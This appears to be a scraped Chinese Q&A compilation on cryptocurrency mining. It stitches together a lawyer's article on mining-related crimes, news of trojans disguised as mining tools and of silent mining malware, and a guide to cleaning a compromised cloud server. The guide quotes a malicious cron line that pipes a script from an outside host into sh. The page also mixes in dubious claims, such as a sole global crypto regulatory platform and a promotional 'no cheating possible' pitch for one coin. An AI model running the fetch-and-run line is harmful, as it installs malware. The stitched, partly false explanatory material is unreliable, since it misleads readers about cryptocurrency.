虚拟币挖矿木马源码

『壹』 挖“比特币”等非法“挖矿”行为可能涉嫌的罪名

加密数字货币非法“挖矿”行为可能涉嫌的刑事犯罪

作者：李俊南 ，上海华勤基信（杭州）律师事务所负责人

近年来，比特币、莱特币、狗狗币等加密数字货币的火热行情吸引无数一夜暴富心态的人群积极参与，币安、火币、OKEx之类的网站迅速扩张拥有大量交易参与方，除了通过买卖途径，很多人也选择通过“挖矿”获得加密数字货币。在“挖矿”的过程中产生一系列行为，而其中部分行为可能涉嫌刑事犯罪。笔者认为，如果要辨析可能涉嫌刑事犯罪的行为，必须先就加密数字货币和“挖矿”行为的概念进行了解。

第一部分 关于加密数字货币和“挖矿”的概念和性质

一、加密数字货币的概念

口语化普遍使用“虚拟货币”或者“数字货币”来指称比特币、莱特币、USDT、狗狗币等，其实“虚拟货币”或者“数字货币”的范围比较广泛，泛指不受管制的、数字化的货币，包括我们日常所知道的腾讯Q币、盛大元宝等 游戏 币或置换网站内部增值服务等的网络专用币，也包括加密数字货币，笔者本文探讨的各种行为或情节特指加密数字货币。加密数字货币是一种使用密码学原理来确保交易安全及控制交易单位创造的交易媒介或者商品，来源于开放式的算法导致没有固定的发行方或管理方，通过网络计算方法进行解密获得原始数字货币，因为算法解总量可控从而做到让数字货币总量固定，交易过程获得网络中各个节点的认可从而导致交易行为的固定性或安全性。

加密数字货币与实物货币或者形式货币的数字化不同，《关于防范比特币风险的通知》[1]和《关于防范虚拟货币交易炒作风险的公告》[2]明确其作为虚拟商品的性质，“不由货币当局发行，不具有法偿性与强制性等货币属性，不是真正的货币，不应且不能作为货币在市场上流通使用”。货币最初为不容易大量获取的物品，而后变为金属（尤其是金银），这些本身即有价值的物品被挑选出来赋予交换权，按照某一时间点特定的价值比例可以循环、普适地交换其他商品或服务。政府（包括其他具有公信力的主体）成立后发行法币，基于政府公信力和金银储量等基础进行许诺，赋予法币可以代替实物货币进行与商品或服务之间的交换。法币（比如人民币、美元、英镑等）是在主权信用、货币契约理论和金银储备等基础上而被赋予的代表一定可供交换价值的 社会 接受度。而 社会 之所以接受，是因为发行法币时，主权机构将会就该等份额的法币做出相应信用许诺，法币具有转化为真实实物价值的可能性。通常每个主权国家或区域只是用一种法币，由中央银行发行和控制，严格遵循“MPQV”的公式进行计算，避免发生严重背离市场的通货膨胀或紧缩。

加密数字货币背后并没有所谓的主权信用或价值支撑，是通过区块链技术保密和流通、计算机算法而获得的虚拟物。区块链是用分布式数据库识别、传播和记载信息的智能化对等网络。2009年比特币第一个区块被开发出来，有人称之为“创世区块”。用于加密数字货币的计算机算法，目的是生成一种虚拟标记，这个标记被设定的程序认为完成了程序要求的解或运算结果程度，基于运算结果给这个标记一定的数字货币值。这个值本身没有内在价值，是数学难题的解答，充其量可能对应的就是解法研发和所耗费的“矿机”购买价格、能耗价格等，而前者无法代表有价物，后者代表的只有消耗而没有创造。

二、“矿机”和“挖矿”

获得加密数字货币的初始方法就是运算，需要借助计算机（“矿机”）来完成复杂运算过程。“矿机”通过中央处理器芯片或者显卡参与数学计算，开展“挖矿”过程。如果能够计算出结果，那么被赋予一个或者几分之一个数字货币值。以比特币为例，“挖矿”就是找到一个随机数（Nonce）参与哈希运算Hash（BlockHeader），使得最后得到的哈希值符合难度要求。

“挖矿”过程涉及的参与方和设备材料包括矿工、矿机、矿机销售方、矿池管理方、区块确认和广播等。矿工可以简单地理解为参与“挖矿”的每个人或机构，矿池是为了避免单个矿工“挖矿”收益的不稳定性而聚合矿工后产生的集合，根据不同矿工的运算贡献对收益结果进行分配，区块确认和广播是通过区块链节点互相认可某一个矿机代表的矿工工作量证明，进行记账和通知其他节点。矿工的收益存储于有密钥的电子钱包中，可以查阅、使用和交易。“挖矿”的形式主要分为集中托管式和分布式，前者是矿工将矿机托管给某个矿池管理方，矿工支付电费和管理费，矿池管理方统一进行操作维护；后者是矿工自行管理矿机。

笔者认为单纯的“挖矿”行为在此前并未存在任何有关于涉嫌违法的法律规定，但2021年5月21日国务院金融稳定发展委员会召开第五十一次会议，根据会议精神，“坚决打击比特币挖矿和交易行为”，此后就虚拟货币非法“挖矿”行为应当会出台进一步的规定。

第二部分 非法“挖矿”行为涉及刑事犯罪的现状

一、笔者以“刑事案件”、“虚拟货币”、“挖矿”等关键词在中国裁判文书网中进行搜索，存在132篇文书。经过对案件文书的研判，笔者发现：

1.根据审判程序来看。 一审判决书占比81.81%；二审裁定书等占比16.67%；审判监督驳回申诉通知书等占比1.52%。

2.根据定罪罪名来看。 （1）一审定罪主要分布为：盗窃罪主要为盗窃公共电力资源，计算机系统相关犯罪主要为在他人计算机内植入木马外挂程序、利用工作职务便利使用可控制的计算机系统挖矿等，非法吸收公众存款罪、诈骗罪、集资诈骗罪和组织、领导传销活动罪除了与“挖矿”有关，还与加密数字货币的发行紧密相关，少量盗窃罪和其他类案件主要是与矿机买卖相关，或“挖矿”收益取得后被非法侵犯产生的其他犯罪行为。大量案件为单一罪名，少量案件数罪并罚。（2）二审定罪主要为组织、领导传销组织犯罪，占50%；控制、入侵、破坏计算机系统等计算机系统相关犯罪，占18.18%；其余各项罪名（抢劫罪、集资诈骗罪、非法吸收公众存款罪、盗窃罪等）占31.82%。基本所有案件均维持原判。

二、笔者另通过网络搜索发现：

2018年5月腾讯网报道[3]称，“西安市未央区检察院提前介入一起特大网络黑客盗窃虚拟货币案，并批捕该案三名嫌疑人。三名嫌疑人为专业化的网络技术人员，组织‘黑客联盟’非法侵入他人计算机系统并将计算机中的虚拟货币转移，涉案金额高达6亿元”。

2020年11月哈尔滨新闻网报道[4]称，黑龙江警方抓获28名犯罪嫌疑人，成功破获一起涉嫌以“哥伦布CAT虚拟货币”“挖矿”为噱头的特大网络传销案件，总价值近人民币3亿元。

2021年5月8日法制现场报道[5]称，武汉市洪山警方“宣布打掉一专为网络诈骗团伙开发APP的 科技 公司”，“晟昌 科技 ”接受委托定制开发一款名为联合众鑫的虚拟币平台，以USDT充值后，“宣称兑换联合众鑫独有币种ZBCT后，可在平台内购买矿机挖矿产生收益”，但矿机运营图片全部为网络图片，同时可以使用后台修改权限，“随意修改ZBCT价格及具体收益比率”。“晟昌 科技 ”公司“3年间开发了150余个涉及区块链、虚拟货币、电子钱包、网络商城等APP、小程序，几乎全部是网络金融诈骗、传销团伙所定制”[6]。

公布案例和网络报道表明，近年来与加密数字货币“挖矿”行为相关的违法犯罪活动非常猖獗，采取网络等方式，存在金额高、行为性质复杂、多角色参与、受害者群体遍布广等特征。

第三部分 就非法“挖矿”行为涉及刑事犯罪的一些思考

一、我国关于非法“挖矿”行为的态度

从2013年12月中国人民银行等五部委发布的《关于防范比特币风险的通知》至2021年5月21日国务院金融稳定发展委员会第五十一次会议要求，都在宏观层面确认了加密数字货币在发行、交易过程中可能存在风险。因为加密数字货币去中心化不可管控的特性，被大量的犯罪活动所“青睐”。

2021年5月25日，内蒙古发展和改革委员会发布了《关于坚决打击惩戒虚拟货币“挖矿”行为八项措施（征求意见稿）》，发布之前已多次对虚拟货币“挖矿”和交易行为进行围追堵截。国家能源局四川监管办公室发布《关于召开虚拟货币“挖矿”有关情况调研座谈会的通知》。

二、从国际上而言

新加坡、韩国、日本等地均已出台了与虚拟货币相关的行业规范政策，比如在投资人门槛、交易所牌照、实名认证机制等方面均有所要求。印度则准备直接禁止民众交易及持有加密数字货币。各个国家和地区的大趋势也逐渐朝着管控方向归拢。

三、非法“挖矿”行为的非法性体现分析

单纯的个人购买或者租用矿机进行加密数字货币“挖矿”，并未有法律规定禁止，这是基于个人需要而获得虚拟商品的行为，需要被禁止的应当是带有非法属性的“挖矿”行为。

前文提及的案例表明，主要犯罪行为体现为：

1.技术型非法攫取

部分不法分子利用投资者购买矿机，或管理计算机，或其他便利条件，通过对计算机系统内植入木马病毒为自己“挖矿”，涉嫌 入侵、控制或破坏计算机系统犯罪 ,或盗取他人已经获得的加密数字货币 涉嫌盗窃罪 。

2.盗取电力资源

部分不法分子通过私设电缆、增设微电脑控制器等手段盗窃电能用于“挖矿”，已经成为了部分地区的多发性案件。盗电行为不仅仅直接通过秘密手段非法使用和侵犯了公共资源和他人合法权益，同时可能会因线路漏电引起火灾、影响节能减排政策下的区域供电安排和平衡、影响区域性阶梯用电的电价，应予以打击。

3.引发 非法吸收公众存款罪，诈骗罪 或 组织、领导传销活动罪 等涉众

（1）A宣称可以销售（含销售后托管）或租赁矿机进行“挖矿”， A向 社会 公众宣称，矿机具有强大的算力（衡量矿机销售价格或租赁费用多以算力或配置为主要标准之一），称可以每月获得一定的加密数字货币收益回报。如果回报是维持在一定的固定标准时，则A就有可能 涉嫌非法吸收公众存款罪 。

（2）A宣称其矿机存在一定标准的算力，但实际未达到该等运算效率，甚至矿机并不实际存在，A收受投资人支付的购买款和租赁费，就 涉嫌诈骗罪、合同诈骗罪 或 集资诈骗罪 。

（3）A通过三级以上代理渠道推广“挖矿”业务，要求各级代理必须先购买或承租一定数量的矿机，可以介绍他人参与购买或承租矿机“挖矿”的行为，可以获得浮动收益。也就是说，代理通过购买或承租一定数量的矿机获得入会资格，再通过拉人头等方式拿到另外的利润分配，形成三级或以上组织架构，A将 涉嫌组织、领导传销活动罪 。

四、再进一步思考

1.A没有矿机或矿机根本不符合其宣称的性能，向投资人销售的同时约定托管，或进行租赁时以虚假信息表现存在矿机、以各种借口阻止投资人现场查看或查看虚假场所，但是A与投资人约定退出机制并按月交付投资收益，在市场上购买加密数字货币宣称“挖矿所得”给予投资人、赚取利差的行为，是否涉嫌犯罪？笔者认为A的行为属于诈骗行为，究其本质都是采用了虚构事实或者隐瞒真相的行为，使投资人误以为A有符合宣传的矿机、可以带来符合预期的收益，才支付的购买价款或租赁费用。

2.A自己发行了一种加密数字货币，自行定价，宣称租赁A的矿机可以“挖矿”获得该加密数字货币，实际上并没有矿机供投资人使用，仅仅是根据投资人的投入金额，向投资人固定地发放加密数字货币。A通过程序设定“挖矿”所得数量，甚至将该加密数字货币与主流加密数字货币的兑换价格无限调整，是否涉嫌犯罪？笔者认为，A的行为仍然是诈骗行为，该加密数字货币可能仅仅在A控制网络节点中做闭环运作，通过一系列的包装，利用投资人的回报期待，以无价值的数字化产物置换法币（也可能现要求投资人以法币购买主流加密数字货币，再以主流加密数字货币进行投资，增加手段的隐蔽性），实际上还是非法占有受害人财产。

3.A发行了加密数字货币，投资人租赁矿机参与“挖矿”的目的不在于看好该加密数字货币的升值空间，而在于该加密数字货币与主流加密数字货币的恒定兑换比例。投资人以其获得的黑色或灰色收入购买该加密数字货币，在闭环系统里兑换为主流加密数字货币，通过买卖获得法币资产。涉及犯罪所得的非法收入通过“挖矿”洗白。A的行为根据其故意程度、参与上游犯罪程度，可能涉嫌上游犯罪的共犯、帮助网络信息犯罪活动罪、掩饰隐瞒犯罪所得罪、洗钱罪等。

综上所述，大量人群为了高回报期待参与“挖矿”行为，在不法分子的引诱、欺骗下，或在自身利益驱动下可能发生违法犯罪的行为，涉案的罪名种类繁多，行为手段也日趋复杂化、隐蔽化、涉众化，需要加强监管，避免加密数字货币的热潮给犯罪活动提供温床。

『贰』 如此多的虚拟货币平台，多少崩盘了

合肥人李某今年10月份花14万累计购买了124个比特币。事后，李某加入一些比特币玩家聊天群，密切关注比特币的行情。 10月22日，群内一个网名Michael的人主动找李某聊天，问他是否挖矿。 “我不会，而且也挖不到钱。 ”李先生如是回答。Michael一再怂恿李某试试看，并给李某发来了“挖矿工具”，声称可用该工具挖到更多比特币。在随后的聊天中，Michael不断提醒李某要将比特币放在钱包，并称交易网站不安全。 “网络上不时有交易网站倒闭、跑路的消息，他说的也蛮在理，就相信他了。 ”李某告诉安徽商报记者。
100个比特币不翼而飞
李某接收并安装了挖矿工具。 10月26日晚，他在Michael的诱导下陆续将名下100个比特币放到电子钱包中。不过，当电子钱包中的比特币刚到100时，竟突然不翼而飞。李某一下子慌了神，再与Michael联系时，对方便隐身不见了。
李某告诉记者，目前一个比特币要卖五六千元左右，100个比特币价值五六十万元。事后，李某向警方报案。不过，令李某失望的是，因为比特币是一种虚拟货币，目前国内尚无相关法律能够对其交易进行规范和保护。警方没有立案。 “现在，这个叫Michael的人还在网上活跃，他就是在钻法律的空子。 ”李某告诉安徽商报记者。
“挖矿工具”里有木马
李某的比特币怎么会不翼而飞呢？ 360安全工程师与他联系并检测了Michael的“挖矿工具”，发现该工具就是今年非常流行的“比特币大盗”木马。据360安全中心分析，“比特币大盗”木马大多伪装成挖矿工具、精简钱包等压缩文件，一旦玩家中招，木马便会自动搜索比特币钱包文件，并通过电子邮件、黑客远控等方式将钱包文件偷走。

『叁』 现在每一个数字虚拟货币都有开源代码我们怎么分析呢

五种区分方法：去中心化、恒量“发行”、开源代码、独立的电子钱包以及第三方交易平台。

一、去中心化

很多人对去中心化概念比较模糊，也有很多关于币的项目也在打着去中心化的旗号在推动者这个市场。

1、技术去中心化：比特币，莱特币是整个数字货币的一个币种，区块链技术是2.0。美国5年的一个研究，它研究这一块是失败的，只达到1.0。

2、不属于任何一个公司国家或者机构。比如人民币，美元等都是法币，是由国家发行和控制，是由中心的；还有腾讯公司的Q币也是有中心的，叫虚拟币，不叫虚拟货币，是腾讯公司发行的。

二、价格为什么会涨的，恒量“发行”。

其实真正意义上来说，是不应该用“发行”二字的，比特币2100万枚，莱特币是8400万枚，其发起人是把这个数字货币计算机计算好，用一套公式保存起来，用互联网程序规定它全球只能有多少枚，是挖掘出来的。

听说挖地挖地，挖地的矿机，都是时间和数量限制好的，是任何个人或者机构都是更改不了的，并公开它的源代码，谁都可以挖。物以稀为贵，之所以挖矿，就如地球上的黄金一样越挖越少，所以叫挖矿，价格就会上涨。

人民币一直在超发，就出现通货膨胀的现象，越来越不值钱。真正的数字货币是全球永不蒸发，恒量“发行”，具有真正的稀缺性的，通货紧缩的特质。

三、开源代码，这是一个关键核心。

目前所有的数字货币只有一个监管平台，开源代码成熟，一定要去全球唯一的数字货币监管平台审核，通过后挂在此平台上，公布它的开源代码。

还有一种方式，就是你看各大交易平台是不是有莱特币和比特币的身影，凡是公开透明的都是自由买卖交易。

四、独立的电子钱包。

跨境支付的，是可以给某个区域的转账。

五、第三方交易平台

封闭式的交易平台和开放式的交易平台

1、什么是封闭式交易平台呢？

举例，比如凭票购物，凭票吃饭那个年代，你是化工厂的，你是粮局的，今天你拿着工厂的饭票去粮局吃饭是不可以的，是属于内部掌控的。

2、开放式的交易平台，像OKCOIN，火币网，都是开放式的。任何一个平台购买的莱特币都是可以在这个平台上进行买卖交易的，公开，透明。

总之，是不是真正数字货币，有五大标准：

1、去中心化；2、开源代码；3、恒量发行；4、第三方交易平台；5、电子钱包。

(3)虚拟币挖矿木马源码扩展阅读：

虚拟货币基本阶段

没有把游戏币与股票、衍生金融工具、特别是电子货币加以界定和区分。实际上，有一条内在线索可以把这些形态各异的虚拟货币贯穿起来，这就是个性化价值的表现成熟度。我们从逻辑上概括如下：

一、银行电子货币

银行电子货币最初是一种“伪虚拟货币”。它只具有虚拟货币的形式，如数字化、符号化，但不具有虚拟货币的实质，与个性化无关。例如，它只是纸币的对应物；它可能由央行发行；它可能与货币市场处于同一市场等。

但是银行电子货币有一点突破了货币的外延—那就是它也可以不是由央行发行，而是由信息服务商发行，早期的几种电子货币就是这样。第二点突破就是银行电子货币的流动性，远远超过一般货币。因此就隐含了对货币价格水平定价权的挑战。

比如，在隔夜拆借之中，如果同一笔货币以电子货币方式被周转若干次，虽然从传统货币观点，一切都没有发生，但如果从虚拟货币流通速度的角度看，实际上已改变了货币价格水平的条件。

二、信用信息货币

股票是最典型的信用信息货币，其本质是虚拟的，是一种具有个人化特点的虚拟货币。它是当前虚拟经济最现实的基础。股票市场、衍生金融工具市场，构成了一个规模庞大而且统一的虚拟货币市场，它们不仅有实体业务作为基础，而且有广泛的信托业务、保险业务等信息服务作为支撑。

所谓统一市场是有所特指的，是指这一市场作为一个整体，可以同货币市场在国民收入的整体水平上进行交换。从历史上看，只有当货币形成统一市场，即国民经济的主体都实现货币化时，货币量和利率对国民经济的调节作用才谈得上。这个道理对虚拟经济也一样。

这个问题不无争议，如今虚拟经济的规模，虽然已经若干倍于实体经济，但实体经济中毕竟还有很大一部分没有进入这个统一市场。如果把游戏币与股票比较，它在这方面的进展还差得远。只有经过娱乐产业化和产业娱乐化两个阶段，才有可能达到统一市场的水平。

分析股票市场和衍生金融工具市场，它有一个与一般货币市场最大的不同，就是它的流通速度不能由央行直接决定。例如，股指作为虚拟货币价格水平，不能象利率那样，由央行直接决定，而是由所谓人们的“信心”这种信息直接决定的。

央行以及实体资本市场的基本面，只能间接决定股市，而不能直接决定。所以我认为股票市场是信息市场而不是货币市场。

同成熟的虚拟货币市场比较，股市在主要特征上，表现是不完全的。股市把所有参照点上的噪音（即个别得失值），集成为一个统一的参照值，与标准值（基本面上的效用值、一般均衡值）进行合成，形成市场围绕效用价值的不断波动。

虽然有别于以央行为中心进行有序化向心运动的货币市场，但与货币市场又没有区别。而从真正的虚拟货币市场的观点看，不可通约的个性化定价值，才是这一市场的特性所在。从这个意义上说，集中的股市并没有实现这一功用，股市作为所谓“赌场”的独立作用还没有得到发挥。

三、个性化信用凭证

虚拟货币的根本作用，是在个性的“现场”合成价值，而不是跑到一个脱离真实世界的均衡点上孤立地确定一个理性价值。虚拟货币的意义在于以最终消费者为中心建立价值体系。虚拟货币全面实现后，只有一般等价功能的单一货币将趋于后台化。

游戏币是更高阶段虚拟货币的试验田，还难当大任。理想的虚拟货币是真实世界的价值符号。在一般等价交换中，具体使用价值以及具体使用价值的主体对应物—人的非同质化的需求、个性化需求，被完全过滤掉。

虚拟货币将改变这一切，通过虚拟方式，将人的非同质化需求、个性化需求以个体参照点向基本面锚定的方式，进行价值合成。因此虚拟货币必须具有两面性，一方面是具有商品交换的功能，一方面是具有物物交换的功能。

通过前者克服价值的相对性和主观性，通过后者实现个性化的价值确认。 为了实现这个目标，虚拟货币肯定要实现一不为人知的巨大转型，这就是向对话体系的转型，成为交互式货币。

这里的讨价还价是针对货币价格水平的讨价还价。回忆一下，人类在几十年内，早已实现的文本向对话的转型，正是虚拟货币转型的方向所在。游戏币的价值其实是不确定的。人们交换到游戏币，从中最终可能得到的快乐，是在币值以上、还是以下，不到参与游戏之时是不确定的。

游戏就是一个对话过程。当然，游戏币的各种增值功能，还没有结合个性化信息服务开发出来。如果这种增值业务充分得到开发，游戏币因为提供服务的商家不同而不通用，可能反而成为一种相对于股票的优势。

完全个性化的虚拟货币，可能是一种附加信息的货币卡，它的价值是待确认的。拥有具体待定功能和余值的虚拟货币，其信息一方面可以具有象文本一样有再阐释的余地，一方面具有卡拉OK式的再开发的潜力。

它的信息价值是有开放接口的，可以再增值的。如果把它们投入股市一样的二级市场交换，它们可能凭其个性化信息在基本票面价值上下浮动，它本身就会具有更多的象股票那样的吸引力。

游戏货币，还只具有价值流通功能，而不具有市场平台功能，所以它只是一种不完善的虚拟货币，究其原因，是因为缺乏相应的产业基础。

『肆』 电脑挖矿违法吗

正常用着的电脑，却被非法控制，替别人“干活”，用户却浑然不知。原来，电脑被植入了挖矿程序及挖矿监控程序，监控程序只要监测到电脑CPU利用率低于50%，挖矿程序就会在后台静默启动，通过大量耗费被控电脑的CPU、GPU资源和电力资源，持续不断地挖取虚拟货币，并将这些虚拟货币转至控制者处，从而提现牟取暴利。
近期，潍坊市公安局网安支队会同青州市公安局在公安部、省公安厅指导下，在腾讯守护者计划安全团队协助下，按照公安部和省公安厅“净网2018专项行动”部署要求，成功破获部督“1.03”特大非法控制计算机信息系统案，目前抓获犯罪嫌疑人20名，取保候审11名，批捕9名。
经查，大连升平网络科技有限公司研发挖矿监控软件、集成挖矿程序后，通过发展下线代理，非法控制了全国389余万台电脑主机做广告增值收益，在100多万台电脑主机静默安装挖矿程序。两年期间共挖取DGB币（“极特币”）、DCR币（“德赛币”）、SC（“云产币”）币2600余万枚，共非法获利1500余万元。
据了解，虽然非法控制计算机信息系统的违法犯罪屡见不鲜，但是数量达到如此之巨，而且通过植入静默挖矿程序这种新型手段，进行虚拟货币变现，这在全国是比较少见的。

游戏外挂暗藏挖矿木马程序
2018年1月3日，潍坊市公安局网安支队接腾讯守护者计划安全团队报案称，腾讯电脑管家检测到一款游戏外挂暗藏了一款木马程序，该木马程序具备后台静默挖矿功能。
“挖矿，就是通过大量计算机运算获取数字货币-虚拟货币奖励，这个过程对电脑硬件配置要求比较高，主机经常长期高负荷运转，显卡、主板、内存等硬件会提前报废，对电脑的损害极大。”办案民警介绍。
办案民警说，违法犯罪人员通常提前调研市面上挖取难度较低的虚拟货币，通过云计算、显卡云计算业务非法控制用户的电脑主机，植入这种虚拟货币的挖矿程序进行挖矿，用户对此毫无察觉，只要电脑处于开机状态，挖矿程序就在后台静默运转，在挖取到大量矿币后迅速转至控制者那里变现提现，牟取高额利润。
初步统计，该木马程序感染数十万台用户机器。潍坊市公安局网安支队接案后，迅速研判案件线索，通过互联网提取到外挂木马样本，找到木马开发者建立的木马交流群，初步落查发现该款木马程序开发者在青州市。市局网安支队将该案情通报青州市公安局，由市局网安支队、青州市局成立专案组，对该案立案侦查。
专案组确定交流群群主身份为杨某宝。通过侦查发现，杨某宝一是建立了多个外挂讨论群，在群文件中共享外挂程序；二是利用“天下网吧论坛”版主的身份，将上传含有木马的外挂程序到“天下网吧”论坛供网民下载；三是通过网络网盘进行分享下载。
3月8日，专案组制定了详细的抓捕方案，在家中将杨某宝抓获。

『伍』 很多虚拟货币会出现提前挖矿的作弊现象，那个雷乐币会不会啊

应 该 不 会 ， 雷 乐 币 他 们 在 发 行 时 就 提 前 宣 布 时 间 ， 并 且 承 诺 绝 不 作 弊 提 前 挖 矿 。 雷 乐 币 的 所 有 交 易 记 录 虽 然 是 公 开 的 ， 但 是 这 些 交 易 的 相 关 人 是 匿 名 的 。 雷 乐 币 的 所 有 源 代 码 也 是 公 开 的 ， 所 有 人 都 可 以 检 查 代 码 ， 没 有 任 何 作 假 的 可 能 。

『陆』 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

『柒』 虚拟币怎么搭建矿池 虚拟币研发与运营 虚拟币制作

虚拟货币制作需要专业的团队，但是如果去制作一个直销币，没存在钱包，也不存在维护，只是纯粹的数字，那就简单多了，成本是非常低的，一个交易平台也就是几千块钱吧。但是这种平台存在严重的漏洞，很容易被攻击。
如果想创造一个像比特币、瑞泰币、千金卡一样的虚拟货币，那就需要付出一些努力，这些币首先需要卡法一个可下载的钱包，已经确定这种币的应用场景，同时还需要创建一个安全靠谱的交易平台。

『捌』 挖矿木马，挖矿消耗计算机资源到底是在做什么东西

区块链技术，货币是有限的，消耗资源挖矿，进行虚拟货币交易。

『玖』 虚拟货币有了开源代码就可以挖矿吗

EGD网络通过“挖矿”来生成新的EGD。所谓“挖矿”实质上是用计算机解决一项复杂的数学问题，来保证EGD网络分布式记账系统的一致性。EGD网络会自动调整数学问题的难度，让整个网络约每2.5分钟得到一个合格答案。随后EGD网络会新生成一定量的EGD作为赏金，奖励获得答案的人。 2014年1月1日EGD诞生的时候，每笔赏金是50个EGD。诞生2.5分钟后，第一批50个EGD生成了，而此时的货币总量就是50。随后EGD就以约每2.5分钟50个的速度增长。当总量达到4200万时(8400万的50%)，赏金减半为25个。当总量达到6300万(新产出2100万，即4200的50%)时，赏金再减半为12.5个。